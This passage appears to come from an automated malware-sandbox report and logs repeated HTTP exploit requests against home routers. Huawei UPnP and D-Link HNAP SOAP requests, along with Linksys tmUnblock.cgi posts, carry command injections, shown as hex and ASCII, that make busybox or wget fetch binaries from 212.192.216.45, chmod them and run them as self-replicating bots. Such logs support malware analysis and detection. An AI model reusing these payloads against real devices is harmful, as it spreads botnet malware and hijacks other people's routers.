62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 